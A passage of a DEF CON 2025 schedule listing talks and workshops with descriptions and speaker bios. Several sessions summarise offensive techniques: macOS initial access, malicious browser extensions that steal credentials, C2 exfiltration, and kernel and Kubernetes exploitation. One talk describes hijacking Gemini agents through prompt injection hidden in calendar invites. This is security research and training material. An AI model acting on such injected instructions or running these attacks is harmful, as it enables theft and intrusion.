Tom Cross is an entrepreneur and technology leader with three decades of experience in the hacker community. Tom attended the first DefCon in 1993 and he ran bulletin board systems and listservs in the early 1990’s that served the hacker community in the southeastern United States. He is currently an independent security consultant, Principal at Kopidion, and creator of FeedSeer, a news reader for Mastodon. Previously he was CoFounder and CTO of Drawbridge Networks, Director of Security Research at Lancope, and Manager of the IBM Internet Security Systems X-Force Advanced Research team. He has written papers on collateral damage in cyber conflict, vulnerability disclosure ethics, security issues in internet routers, encrypting open wireless networks, and protecting Wikipedia from vandalism. He has spoken at numerous security conferences, including Black Hat Briefings, Defcon, CyCon, HOPE, Source Boston, FIRST, and Security B-Sides. He has a B.S. in Computer Engineering from the Georgia Institute of Technology. He can be found on Linkedin as https://www.linkedin.com/in/tom-cross-71455/, and on Mastodon as https://ioc.exchange/@decius.

SpeakerBio:  Greg Conti, Co-Founder and Principal at Kopidion

Greg Conti is a hacker, maker, and computer scientist. He is a nine-time DEF CON speaker, a seven-time Black Hat speaker, and has been a Black Hat Trainer for 10 years. He’s taught Adversarial Thinking techniques at West Point, Stanford University bootcamps, NSA/U.S. Cyber Command, and for private clients in the financial and cybersecurity sectors. Greg is Co-Founder and Principal at Kopidion, a cyber security training and professional services firm.

Formerly he served on the West Point faculty for 16 years, where he led their cybersecurity research and education programs. During his U.S. Army and Military Intelligence career he co-created U.S. Cyber Command’s Joint Advanced Cyberwarfare Course, deployed to Iraq as Officer-in-Charge of U.S. Cyber Command’s Expeditionary Cyber Support Element, and was the first Director of the Army Cyber Institute.

Greg is co-author of On Cyber: Towards an Operational Art for Cyber Operations, and approximately 100 articles and papers covering hacking, online privacy, usable security, cyber conflict, and security visualization. Greg holds a B.S. from West Point, an M.S. from Johns Hopkins University, and a Ph.D. from the Georgia Institute of Technology, all in computer science. His work may be found at gregconti.com (https://www.gregconti.com/), kopidion.com (https://www.kopidion.com/) and LinkedIn (https://www.linkedin.com/in/greg-conti-7a8521/).


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 14:00-15:50 PDT


Title: Initial Access Tactics on MacOS
When: Friday, Aug 8, 14:00 - 15:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Tactics 1 - Map

Description:

In this tactic section the attendees will get to experiment with highly custom initial access payloads and the controls they are meant to bypass on MacOS. Attendees will be able to pick the tactics they want to run based on their experience. We plan on setting up the following tactics

Beginner: Create a simple pkg w/ pre and post install scripts. Creating an Application Bundle w/ installer guide to get around Gatekeeper. Creating a simple Configuration Profile to Disable Gatekeeper

Intermediate: Using an Application bundle to register and abuse existing URI handlers Abusing xcode URI handler to gain code execution Creating a pkg to over-write managed preferences and install a malicious browser extension

Advanced: Compiling and embedding Mythic poseidon implant as a Shared Library to get around EDRs Creating a MacOS VM to receive MDM config from a DEP enrolled device.

Speakers:Adwiteeya Agrawal,Jianqiang (Stark) Li

SpeakerBio:  Adwiteeya Agrawal

Adwiteeya Agrawal currently works as an Offensive Security Engineer for a tech company in California. Adwiteeya has worked on several internal Red Teams and currently focuses on MacOS Security, Cloud Security and Purple Teaming. Adwiteeya graduated from Carnegie Mellon University with a Masters in Information Security and is passionate about all things security.

SpeakerBio:  Jianqiang (Stark) Li

Stark is working @Snap as a red teamer.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 11:00-11:45 PDT


Title: Inside Look at a Chinese Operational Relay Network
When: Friday, Aug 8, 11:00 - 11:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

Operational relay box (ORB) networks are used by hackers to obscure their true origin, effectively turning a network of computers into their own private TOR network. This talk is an inside look at a relay network we believe to be based in the People’s Republic of China based entirely on public data we stumbled upon. It will contain an unprecedented level of detail into the specific tools, networks, and development techniques used to create and operate an ORB network.

If you’re a cloud provider trying to stop this type of abuse, a defender trying to understand how to detect when a relay is being used, or a wanna-be attacker, this is the talk for you. We name the cloud providers, data storage systems, software tools, domain names, email addresses, and passwords that they use to create, maintain, and operate their network.

References:

link link link

Speakers:Michael "mtu" Torres,Zane "earl" Hoffman

SpeakerBio:  Michael "mtu" Torres

mtu, otherwise known as Michael Torres, is a security engineer focused on detecting bad things at scale. Michael is also a Staff Sergeant in the United States Marine Corps Reserve, where he has been responsible for planning and conducting both offensive and defensive cyber operations. He likes to learn new stuff, then share it to benefit others, and is an active volunteer for VetSec (veteransec.org), a charity focused on helping military veterans have successful careers in cybersecurity.

SpeakerBio:  Zane "earl" Hoffman

Earf, also known as Zane, is a DevOps Engineer that does vulnerability research in his free time. Zane recently left active duty as a U.S. Marine, where he did vulnerability research and tool development full time. He is also a certified airplane seamstress, qualified to operate industrial sewing machines to maintain aircraft equipment. He likes to hike, climb rocks, and tear apart devices with his hot air gun, soldering machine, and funny looking glasses.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 09:00-12:59 PDT


Title: Inside the Threat: Designing and Deploying Malicious Browser Extensions to Understand Their Risk
When: Friday, Aug 8, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N256 - Map

Description:

Browser extensions have quietly become one of the most underappreciated attack surfaces. While marketed as productivity enhancers, many of these extensions operate with elevated privileges that rival native malware in terms of access to sensitive user and organizational data.

This hands-on workshop takes a deep dive into how browser extensions operate under the hood and exposes how easily legitimate APIs can be weaponized to exfiltrate credentials, hijack sessions, monitor user behavior, and leak sensitive corporate information. By reverse-engineering real-world extension behavior and building functioning proof-of-concept (PoC) malicious extensions, participants will gain a direct understanding of the risks these extensions pose.

Through practical exercises, participants will: - Learn the browser extension architecture and permission model - Examine key APIs commonly misused for surveillance or data theft - Build PoC malicious extensions that exfiltrate session cookies, read passwords, record keystrokes, capture DOM content, and more - Analyze techniques for stealth, obfuscation, and evasion - Explore detection blind spots in endpoint and SSE security tools - Review mitigation strategies and enterprise hardening recommendations

Speakers:Or Eshed,Aviad Gispan

SpeakerBio:  Or Eshed, CEO at LayerX Security

Or Eshed is CEO and co-founder at LayerX Security. Prior to founding LayerX, Or worked for 12 years as a cybersecurity and OPSEC expert at ABN AMRO Bank, Otorio, and Check Point, where he led the takedown of the world's largest browser hijacking operation with over 50M browsers compromised, and his work led to the arrest of more than 15 threat actors. Or also has an MSc in Applied Economics from the Hebrew University of Jerusalem.

SpeakerBio:  Aviad Gispan, Senior Researcher at LayerX Security

Aviad Gispan is a Senior Researcher at LayerX Security, with over a decade of experience in browser security, JavaScript, and frontend architecture. He develops sandbox technologies to detect malicious extensions and researches advanced techniques to strengthen browser-based protection. Previously, Aviad led innovation in Proofpoint’s Web Isolation group, focusing on performance optimization and resource efficiency.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 12:00-15:50 PDT


Title: Instant API Hacker!
When: Friday, Aug 8, 12:00 - 15:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Tactics 3 - Map

Description:

In this rapid-fire, hands-on tactic, you'll go from zero to hacking your first API in 20 minutes! Find and exploit common REST API vulnerabilities in real-time. No prior hacking experience? No problem! APIs are a great first vector to begin your hacking journey. This workshop is designed for beginners who want quick, practical insights—and some fun along the way.

SpeakerBio:  Corey Ball

Corey Ball is the founder and CEO of hAPI Labs, where he provides penetration testing services. He is the author of Hacking APIs, founder of APIsec University, and has over fifteen years of experience working in IT and cybersecurity. Corey holds the OSCP, CCISO, CISSP, and several other industry certifications.


Return to Index    -    Add to Google    -    ics Calendar file

CPV - Sunday - 10:30-10:45 PDT


Title: Intro to Ciphers [Mini Workshop/Talk]
When: Sunday, Aug 10, 10:30 - 10:45 PDT
Where: LVCCWest-Level1-Hall1-W403 - Map

Description:
SpeakerBio:  Crypto Privacy Village Staff
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

ICSV - Sunday - 11:30-11:59 PDT


Title: Intro to Common Industrial Protocol Exploitation
When: Sunday, Aug 10, 11:30 - 11:59 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

Explore the basics of what CIP is, how it is used in industry, and how to get started hacking it.

SpeakerBio:  Trevor Flynn

Industrial Controls Engineer and ICS security specialist


Return to Index    -    Add to Google    -    ics Calendar file

PSV - Sunday - 10:00-10:59 PDT


Title: Intro to Physical Security Bypass
When: Sunday, Aug 10, 10:00 - 10:59 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

Physical security is an important consideration when designing a comprehensive security solution. There are loads of ways to get through a door without actually attacking the lock itself, including using the egress hardware, access control hardware, and countless other techniques to gain entry. Learn how these attacks work as well as how to defend against these attacks in this talk!

Speakers:Karen Ng,Matthew Cancilla

SpeakerBio:  Karen Ng, Physical Security Village

Karen is a Risk Analyst at GGR Security, and is one of GGR's entry team for physical penetration tests. She has a strong interest in physical security, delivering trainings on physical security vulnerabilities to a wide range of audiences. Karen comes from a background in engineering and has extensive experience in major event logistics. She is one of the Village Leads at the Physical Security Village, and works with the rest of the PSV team to teach how to recognize and fix security exploits to the community. Graphic design is her passion.

SpeakerBio:  Matthew Cancilla, Physical Security Village
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Saturday - 10:15-10:30 PDT


Title: Intro to village
When: Saturday, Aug 9, 10:15 - 10:30 PDT
Where: LVCCWest-Level1-Hall2-W505 - Map

Description:
SpeakerBio:  Leigh-Anne Galloway
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Friday - 10:15-10:30 PDT


Title: Intro to village
When: Friday, Aug 8, 10:15 - 10:30 PDT
Where: LVCCWest-Level1-Hall2-W505 - Map

Description:
SpeakerBio:  Leigh-Anne Galloway
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

BHV - Sunday - 11:30-11:59 PDT


Title: ​​Introducing CIPHER: The Open-Source Platform Revealing Patient Harms from Healthcare Cyberattacks
When: Sunday, Aug 10, 11:30 - 11:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:
Meet CIPHER: an open-source platform exposing how hospital cyberattacks harm patients in real time. CIPHER - “Cyberattack Impacts, Patient Harm and Emergency Response” - transforms digital system failures into downstream clinical effects, mapping patient deaths, delays, and adverse safety incidents across clinical specialties, technical systems, and time. At its core is the CIPHER Cube, a powerful model built from diverse data sources, including academic papers, frontline reports and social media testimonies, that maps patient harms occurring throughout the healthcare ecosystem.

Our models identify complex intersecting patient safety incidents, including adverse effects resulting from missed chemotherapy infusions, delayed C-sections in obstetrics, diagnostic errors in emergency care, and systemic drug dispensing failures. By reframing cyber-risk through the lens of patient safety - not just IT disruption - CIPHER offers a radical new methodology for healthcare security, and a call to action for hackers, medics, and regulators alike to make invisible harm impossible to ignore.

SpeakerBio:  Isabel Straw, PhDMD

Isabel Straw is an Emergency Doctor and Assistant Professor in AI & Cybersecurity, with a comprehensive technical background in machine learning, threat modelling, and AI safety. She has worked for the United Nations on AI Ethics and delivered cybersecurity workshops at hackathons worldwide.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 14:45-15:30 PDT


Title: Introduction of Loong Community & Financial Identity crime (deepfake) regulation of diferetn jurisdictions
When: Friday, Aug 8, 14:45 - 15:30 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

The rapid advancement of deepfake technology, powered by generative adversarial networks (GANs), has revolutionized creative industries but poses significant challenges to global financial security through identity fraud. This study examines the legal and regulatory frameworks addressing deepfake-enabled financial crimes in the UK, EU, and Asia, highlighting the growing sophistication of such fraud, exemplified by a 2024 case in Hong Kong where cybercriminals used deepfake video conferencing to defraud a multinational company of $25 million. Employing a comparative legal analysis and case study approach, this research evaluates the effectiveness of existing regulations, identifies enforcement challenges, and analyzes real-world cases to expose legal gaps. Findings reveal that while China has implemented specific deepfake regulations, the UK, EU, and Hong Kong rely on broader fraud and data protection laws, lacking targeted provisions. These inconsistencies hinder prosecution and cross-jurisdictional cooperation. The study proposes balanced regulatory strategies to combat deepfake-enabled financial fraud while fostering AI innovation, offering critical insights for policymakers, legal practitioners, and financial institutions navigating this evolving threat landscape.

Speakers:Noel Wong,KC Wong

SpeakerBio:  Noel Wong

Noel is a Postgardute student of Master Degree in UCL, major in CyberCrime

SpeakerBio:  KC Wong, Hardware Ninja

hardware.ninja is an independent security researcher. He focuses on hardware security researches, penetration test, incidents response and digital forensics analysis. He was the first and the only Asian leading a group of white-hat hackers to hold an in-depth, hands-on hardware hacking village in BLACK HAT and DEFCON. He is also a frequent speaker and trainer in different top-notch security and forensics conferences including SANS, HTCIA, DFRWS, GCC, CodeBlue, HITB, SINCON, AVTokyo and HITCON.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 09:00-12:59 PDT


Title: Introduction to Cryptographic Attacks
When: Friday, Aug 8, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N255 - Map

Description:

Using cryptography is often a subtle practice and mistakes can result in significant vulnerabilities. This workshop will cover many of these vulnerabilities which have shown up in the real world, including CVE-2020-0601. This will be a hands-on workshop where you will implement the attacks after each one is explained. I will provide a VM with a tool written in Python to execute the attacks. A good way to determine if this workshop is for you is to look at the challenges at cryptopals.com and see if those look interesting, but you could use in person help understanding the attacks. While not a strict subset of those challenges, there is significant overlap. The exercises will range from decrypting ciphertext to recovering private keys from public key attacks allowing us to create TLS cert private key and ssh private key files.

SpeakerBio:  Matt Cheung

Matt Cheung started developing his interest in cryptography during an internship in 2011. He worked on implementation of a secure multi-party protocol by adding elliptic curve support to an existing secure text pattern matching protocol. Implementation weaknesses were not a priority and this concerned Matt. This concern prompted him to learn about cryptographic attacks from Dan Boneh's crypto 1 course offered on Coursera and the Matasano/cryptopals challenges. From this experience he has given workshops at the Boston Application Security Conference, BSidesLV, DEF CON, and the Crypto and Privacy VillageHe now serves on the programming committee of the Crypto and Privacy Village. He now serves on the programming committee of the Crypto and Privacy Village.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 13:00-14:50 PDT


Title: Introduction to Operationalizing & Using C2 (w/ some AI)
When: Saturday, Aug 9, 13:00 - 14:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 1 - Map

Description:

In this workshop we will start from scratch with nothing more than a GCP project. The only requirement to participate in this workshop is a laptop with an internet connection. We will deploy a virtual machine, install and configure the Mythic C2 Server. We will deploy a virtual machine, deploy and configure the Nemesis offensive data enrichment pipeline and operator support system. We will deploy a mythic-connector to send data automatically from Mythic to Nemesis. We will compromise a vulnerable application and deploy a Mythic C2 agent to said application, then exfiltrate data. We will clone my custom fork of RAGnarok locally and process said data from Nemesis using local, offline AI LLM models. (This can also be done in the cloud but I won’t be providing cloud GPU instances for obvious reasons.) We will then use the insights from this data to compromise another more secure host.

Speakers:Gabi Joseph,Josh Millsap

SpeakerBio:  Gabi Joseph

I have been Red Teaming for 4 years with an academic background in AI/ML.

SpeakerBio:  Josh Millsap

I am on the Red Team for Palo Alto Networks. I lead the development, automation, and AI efforts for the team.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 10:00-10:45 PDT


Title: Invitation Is All You Need! Invoking Gemini for Workspace Agents with a Simple Google Calendar Invite
When: Sunday, Aug 10, 10:00 - 10:45 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

Over the past two years, we have witnessed the emergence of a new class of attacks against LLM-powered systems known as Promptware.

Promptware refers to prompts (in the form of text, images, or audio samples) engineered to exploit LLMs at inference time to perform malicious activities within the application context.

While a growing body of research has already warned about a potential shift in the threat landscape posed to applications, Promptware has often been perceived as impractical and exotic due to the presumption that crafting such prompts requires specialized expertise in adversarial machine learning, a cluster of GPUs, and white-box access.

This talk will shatter this misconception forever.

In this talk, we introduce a new variant of Promptware called Targeted Promptware Attacks.

In these attacks, an attacker invites a victim to a Google Calendar meeting whose subject contains an indirect prompt injection.

By doing so, the attacker hijacks the application context, invokes its integrated agents, and exploits their permission to perform malicious activities.

We demonstrate 15 different exploitations of agent hijacking targeting the three most widely used Gemini for Workspace assistants: the web interface (www.gemini.google.com), the mobile application (Gemini for Mobile), and Google Assistant (which is powered by Gemini), which runs with OS permissions on Android devices.

We show that by sending a user an invitation for a meeting (or an email or sharing a Google Doc), attackers could hijack Gemini’s agents and exploit their tools to: Generate toxic content, perform spamming and phishing, delete a victim's calendar events, remotely control a victim's home appliances (connected windows, boiler, and lights), video stream a victim via Zoom, exfiltrate emails and calendar events, geolocate a victim, and launch a worm that tarets Gemini for Workspace clients.

Our demonstrations show that Promptware is capable to perform (1) inter-agent lateral movement (triggering malicious activity between different Gemini agents), and (2) inter-device lateral movement, escaping the boundaries of Gemini and leveraging applications installed on a victim's smartphone to perform malicious activities with physical outcomes (e.g., activating the boiler and lights or opening a window in a victim's apartment).

Finally, we assess the risk posed to end users using a dedicated threat analysis and risk assessment framework we developed.

Our findings indicate that 73% of the identified risks are classified as high-critical, requiring the deployment of immediate mitigations.

Speakers:Ben Nassi,Or "oryair1999" Yair,Stav Cohen

SpeakerBio:  Ben Nassi

Dr. Ben Nassi (https://www.linkedin.com/in/ben-nassi-phd-68a743115/) is a Black Hat board member (Asia and Europe), a cybersecurity expert, and a consultant. Ben specializes in AI security, side channel attacks, cyber-physical systems, and threat analysis and risk assessment. His work has been presented at top academic conferences, published in journals and Magazines, and covered by international media. Ben is a frequent speaker at Black Hat (6), RSAC (2), and DEFCON (3) events and won the 2023 Pwnie Award for the Best Crypto Attack for Video-based Cryptanalysis.

SpeakerBio:  Or "oryair1999" Yair

Or Yair (@oryair1999) is a security research professional with seven years of experience, currently serving as the Security Research Team Lead at SafeBreach. His primary focus lies in vulnerabilities in the Windows operating system’s components, though his past work also included research of Linux kernel components and some Android components. Or's research is driven by innovation and a commitment to challenging conventional thinking. He enjoys contradicting assumptions and considers creativity as a key skill for research. Or frequently presents his vulnerability and security research discoveries internationally at top conferences he speaks at such as Black Hat, DEF CON, RSAC, SecTor, and many more.

SpeakerBio:  Stav Cohen

Stav Cohen is a Ph.D. student at the Technion – Israel Institute of Technology who investigates Cyber-Physical Systems (CPS) that integrate GenAI methodologies and feature Human-in-the-loop interactions, with a specific emphasis on their security and operational aspects. He conducts detailed analyses of GenAI models with the aim of identifying potential vulnerabilities and devising effective strategies to mitigate them. Additionally, he takes a proactive approach by exploring how GenAI methodologies can be utilized to improve both the security and operational efficiency of Cyber-Physical Systems.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Friday - 21:00-23:59 PDT


Title: IoT Village 10th Birthday Party
When: Friday, Aug 8, 21:00 - 23:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

IoT Village is turning 10! Join us for a celebration of 10 years of hacking all of the things at DEF CON. Stop by for birthday cake, exclusive stickers, prizes and giveaways, and did we mention cake?


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 10:30-11:15 PDT


Title: Jailbreaking the Hivemind: Finding and Exploiting Kernel Vulnerabilities in the eBPF Subsystem
When: Sunday, Aug 10, 10:30 - 11:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

Extended Berkeley Packet Filter (eBPF) has revolutionized Linux kernel programmability, but its complex verification and JIT compilation mechanisms present a significant attack surface. This talk provides a technical deep-dive into discovering and exploiting vulnerabilities in the eBPF subsystem, with three key contributions: state-aware fuzzing methodologies specifically designed for eBPF, focusing on verifier state tracking bugs, JIT compiler flaws, and helper function validation bypasses. These techniques go beyond traditional fuzzing by incorporating knowledge of the verifier's internal state machine.

Systematic approach to weaponizing verifier bypasses into practical kernel exploits, including converting bounds calculation errors into arbitrary read/write primitives, bypassing KASLR via targeted information leaks, and achieving privilege escalation through carefully constructed memory corruption.

Security architecture of eBPF and provide concrete recommendations for hardening the subsystem against these attacks, including improvements to the verifier's state tracking, JIT compiler security, and runtime validation.

References:

  1. Alves, T., & Felton, D. (2023). "eBPF, a new Swiss Army knife for Linux." USENIX ;login:, 48(1), 42-48.
  2. Gershuni, E., Amit, N., Gurfinkel, A., Narodytska, N., Navas, J. A., Rinetzky, N., ... & Wei, Y. (2019). "Simple and precise static analysis of untrusted Linux kernel extensions." PLDI 2019: Programming Language Design and Implementation, 1069-1084.
  3. Iannillo, A. K., & Natella, R. (2022). "Fuzzing eBPF JITs: Challenges and solutions for effective vulnerability discovery." Network and Distributed System Security Symposium.
  4. Jian, J., Chen, H., Jiang, Y., & Zou, W. (2021). "The Design and Implementation of a State-Aware eBPF Verifier Fuzzer." IEEE Transactions on Dependable and Secure Computing, 18(5), 2342-2355.
  5. Kolosick, J., Narayan, A., Conrad, E., & Tobin-Hochstadt, S. (2022). "SandTrap: Securing JavaScript Containers with eBPF." USENIX Security Symposium 2022.
  6. Linux Kernel Documentation. (2024). "BPF Documentation." link
SpeakerBio:  Agostino "Van1sh" Panico

Dr. Agostino "van1sh" Panico is a seasoned offensive security expert with over 15 years of experience specializing in advanced red teaming, exploit development, product security testing, and deception tactics. He is one of the few hundred globally to hold the prestigious GSE (GIAC Security Expert) certification. Driven by a passion for uncovering vulnerabilities, Agostino actively contributes to the security community as an organizer for BSides Italy, fostering collaboration and innovation.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 11:00-11:45 PDT


Title: Journey to the center of the PSTN: How I became a phone company, and why you should too.
When: Sunday, Aug 10, 11:00 - 11:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

Whether you access the phone network over your cell phone, an SIP trunk, or via an old-school POTS line, the PSTN is an essential part of your day-to-day life and is a longstanding interest of the hacker community. Despite this interest, the regulatory and technical structures underlying this network are poorly understood, deliberately opaque, and dominated by large corporations.

This talk will demystify the network, starting with a brief overview of the history of the PSTN, followed by a deep dive into the inner functioning of the network. After this, the session will detail the regulatory structures that govern the network, and the technologies it employs. Next, the talk will continue with a practical guide detailing how anyone can form a full local exchange carrier to provide service to their community, covering the entire formation process through first-hand experience: regulatory approval, building interconnect with the PSTN, voice network design, and most importantly, user security and privacy.

With this knowledge in hand, the talk will briefly cover a range of exploits in the network, detailing how STIR/SHAKEN can be trivially bypassed, numbers can be hijacked, and how telecom fraud is monetized. The talk will conclude with a discussion of the future of the PSTN, and potential future issues.

References:

SpeakerBio:  Enzo Damato, Founder at Rice Telecom Corporation

Enzo Damato is a Rice University researcher and lifelong hacker with over 7 years of experience with telecommunications, network administration, and security. He founded Rice Telecom Corporation, a facilities-based CLEC, to further research telecommunications security and robocall mitigation. Enzo has also worked extensively with mainframe systems, winning a best session award at the SHARE conference for his presentation on DIY mainframe acquisition, installation, and configuration. Following this, he has developed and is currently teaching Rice University's first course on mainframe computing. In addition, Enzo manages AS25944, an IX-peered ASN providing connectivity for his extensive personal lab.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 14:00-17:59 PDT


Title: K8sploitation: Hacking Kubernetes the Fun Way
When: Saturday, Aug 9, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N255 - Map

Description:

Kubernetes is now at the heart of modern infrastructure, yet offensive security content targeting real-world K8s exploitation is still underrepresented—even at DEF CON. K8sploitation: Hacking Kubernetes the Fun Way fills that gap by diving deep into hands‑on Kubernetes hacking techniques including privilege escalation, lateral movement, and control plane compromise. In this workshop, we set aside the buzzwords and focus on practical attacks and defenses drawn from real adversary tradecraft. Whether you’re a red teamer looking to understand how attackers think or a defender seeking to shore up your cluster’s security, you’ll gain invaluable insights through live demos, guided labs, and lessons learned from enterprise and government security operations. This session bridges cloud‑native technology with hands‑on offensive security training in a way that’s rare, relevant, and overdue.

Speakers:Marcelo Ribeiro,Jeff Jordan

SpeakerBio:  Marcelo Ribeiro, Hewlett Packard Enterprise (HPE)

Marcelo Ribeiro leads the Offensive Security Special Ops team at Hewlett Packard Enterprise (HPE) with 20+ years of cybersecurity experience across HPE, Microsoft, IBM, and the Brazilian Navy. A former Navy Officer, he helped build Brazil’s Naval Cybersecurity capabilities and led IBM’s DFIR practice in Latin America.

At HPE, Marcelo develops advanced offensive security programs, leveraging Kubernetes infrastructure and AI to enhance offensive operations and harden cyber defenses. He has presented at DEF CON 2024 and various security conferences, sharing expertise on red teaming, cloud security, and Kubernetes exploitation.

Recognized in the EC-Council CEH Hall of Fame (2023), Marcelo holds CISSP, CISM, OSCP, GXPN, GPEN, GWAPT, GAWN, GRID, GREM, GCIH, GCIA, and more. Passionate about pushing offensive security boundaries, he thrives on tackling new adversarial challenges in modern cloud environments.

SpeakerBio:  Jeff Jordan, Hewlett Packard Enterprise (HPE)

Jeff Jordan is a Lead Penetration Tester in the Product Security Office with over 13 years of experience at HPE. He began his career in UEFI validation before transitioning into offensive security, where he now leads technical penetration testing efforts across a wide product portfolio. His work focuses on identifying and mitigating security risks through ethical hacking and secure development practices. Jeff has hands-on experience testing Kubernetes-based platforms, including containerized Home Subscriber Server (HSS) products used in 4G infrastructure. He holds CEH and CCSP certifications and plays a key role in driving product security strategy and execution.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 12:00-12:30 PDT


Title: KeePass, weaponized
When: Friday, Aug 8, 12:00 - 12:30 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Juho Jauhiainen
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 10:30-11:15 PDT


Title: Kill Chain Reloaded: Abusing legacy paths for stealth persistence
When: Saturday, Aug 9, 10:30 - 11:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

Throughout our Red Team operations, we've focused our research on advancing techniques to gain direct access to physical memory and achieve execution with the highest privileges (Kernel-mode). This talk presents the current state of the art in stealthy post-exploitation, sharing innovative approaches and refined methodologies developed over recent years. Topics include: bypassing modern EDR solutions via physical memory access primitives, physical access techniques and advanced post-exploitation techniques in Windows systems. We will demonstrate how low-level access vectors often overlooked can enable persistent, undetectable control over targeted systems. The session is tailored for cybersecurity professionals interested in cutting-edge Red Team tactics and emerging hardware/software threats. Practical demos will be included, along with tools and methodologies applicable across multiple scenarios. This is a deeply technical talk, showcasing real world tradecraft and threat modeling beyond traditional offensive security.

References:

Speakers:Alejandro "0xedh" Hernando,Borja "borjmz" Martinez

SpeakerBio:  Alejandro "0xedh" Hernando

Red Team Operator and Security Researcher with over ten years of experience in offensive cybersecurity. Throughout his career, he has worked hands-on in assessing, exploiting and mitigating security vulnerabilities, developing proof-of-concepts, offensive and defensive tools, and conducting in-depth security research on commercial and proprietary solutions. His approach is based on a combination of applied research and real-world experience, emphasizing continuous learning and optimization of defense and attack strategies.

SpeakerBio:  Borja "borjmz" Martinez

Computer security has been a passion for him for as long as he can remember. He is self-taught and seeks to learn something new every day, both professionally and personally. Specialist with more than 9 years of experience in pentesting, Red Team and Research, having a highly versatile profile. He is also a CTF player.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 11:00-11:45 PDT


Title: Kill List: Hacking an Assassination Site on the Dark Web
When: Sunday, Aug 10, 11:00 - 11:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

Four years ago, Chris found a vulnerability with a murder for hire site on the dark net. He could exploit that vulnerability to intercept the murder orders that were being placed: names, addresses, pattern of life information, photos, and, in some cases, bitcoin payments. He reached out to Carl for help, and a small team was built in secret to intercept and triage these orders. However, after their warnings to the police fell on deaf ears, they ultimately decided to warn the targets on the kill list directly. After an initial series of successes, the investigation expanded rapidly and they formed a global cooperation with the FBI and police forces around the world, resulting over 175 murder orders being disclosed, 34 arrests 28 convictions and over 180 years of prison time being sentenced. This talk will be about those years: about the dangers and threats the team had to navigate, the times of isolation when the police wouldn’t take them seriously, about raids in Romania to uncover the cyber-criminal gang running the site and the psychological impact of racing against time to try to stop people getting murdered.

References:

Speakers:Carl Miller,Chris Monteiro

SpeakerBio:  Carl Miller

Carl Miller is a technologist, journalist and writer. He is the founder of the Centre for the Analysis of Social Media at Demos and the information integrity lab CASM Technology, a Visiting Fellow at the Department of War Studies, King’s College London, a Senior Fellow at the Institute for Strategic Dialogue and a Senior Research Fellow at RAND Europe. He is the author of the The Death of the Gods: The New Global Power Grab which won the Transmission Prize, and is the co-writer and host of the podcast Kill List, which reached #1 in seven countries. It was named the Guardian’s best podcast of 2024, named Podcast of the Year 2025 by the Broadcast Press Guild Awards and was nominated for an Aria and Ambie

SpeakerBio:  Chris Monteiro

Chris is a dark web investigator, ethical hacker and systems administrator for a major company based in London.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 16:30-16:50 PDT


Title: Killing Killnet
When: Friday, Aug 8, 16:30 - 16:50 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

Killnet built its reputation as a decentralized Russian hacktivist force - loud, chaotic, and conveniently aligned with Kremlin objectives. But under the surface, it was something else entirely: a centralized operation controlled by a small group, using noise and hate as cover.

This is the inside story of how a team of just nine people delivered a kill shot to destroy this illusion.

Through targeted investigation and direct engagement, we exposed Killnet’s critical weakness: a financial link to Solaris, at that time, one of Russia’s largest dark web drug markets. By publicly tying their operations to organized cybercrime - we disrupted their narrative, broke internal trust, and triggered full collapse. The result? Loss of state support, severed financial channels, and a rapid implosion of the group’s infrastructure.

We’ll walk through how we tracked Killnet’s leadership, exposed its frontman “KillMilk,” and uncovered the criminal network behind the public facade. Along the way, you’ll get a firsthand look at the real tactics - OSINT, infiltration, pressure points - that brought down one of the most visible cyber collectives.

This isn’t just a postmortem. It’s a case study in strategic disruption, showing how small teams can go head-to-head with well-funded adversaries - and win.

References:

SpeakerBio:  Alex Holden

Alex Holden is the founder and CISO of Hold Security, LLC. Under his leadership, Hold Security played a pivotal role in information security and threat intelligence, becoming one of the most recognizable names in its field. Mr. Holden researches minds and techniques of cyber criminals and helps our society to build better defenses against cyber-attacks.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Saturday - 10:30-17:30 PDT


Title: Kubernetes Competitive CTF
When: Saturday, Aug 9, 10:30 - 17:30 PDT
